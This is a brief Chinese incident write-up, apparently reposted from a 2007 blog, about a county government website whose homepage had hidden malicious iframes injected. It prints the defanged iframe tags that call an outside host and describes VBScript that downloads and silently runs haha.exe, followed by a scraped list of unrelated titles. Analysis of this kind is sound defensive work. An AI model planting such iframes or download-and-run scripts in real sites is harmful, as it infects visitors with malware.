某县政府信息网被挂马 haha.exe
来源:互联网 发布:网络恶意攻击 编辑:程序博客网 时间:2024/04/27 10:16
endurer 原创
2007-03-09 第1版
该信息网首页多处被加入代码:
/---
<iframe src=hxxp://www.ma***p*l**etang.com/bbs/jpg.htm width=0 height=0></iframe>
<iframe src=hxxp://www.ma***p*l**etang.com/bbs/gif.htm width=0 height=0></iframe>
---/
hxxp://www.ma***p*l**etang.com/bbs/gif.htm 包含VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 haha.exe,保存为 %temp%/~temp351.exe,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
网页中还包含字符串“黑吧专用网马生成器”及一个QQ号码。
haha.exe可能已不存在,无法下载。
hxxp://www.ma***p*l**etang.com/bbs/jpg.htm
不存在。
- 某县政府信息网被挂马 haha.exe
- 信息网
- haha
- haha
- haha
- haha
- haha
- haha
- haha
- haha
- haha
- haha
- HAHA
- haha
- haha
- haha!
- haha
- haha
- Linux下Tomcat的安装
- jsp 连接 Mysql
- 设计数据层组件并在层间传递数据
- Internet中使用C/S结构的程序和在局域网中有什么区别
- 行列转换
- 某县政府信息网被挂马 haha.exe
- 合理设计 优化Oracle库表设计的若干方法
- SUSE系统中自动启动相关服务
- 中国应努力统一前苏联的所有军事力量
- Windows XP的备份与还原
- DOM中nodeType的值说明
- 初め
- Windows XP安装中的潜在危险
- Windows XP的卸载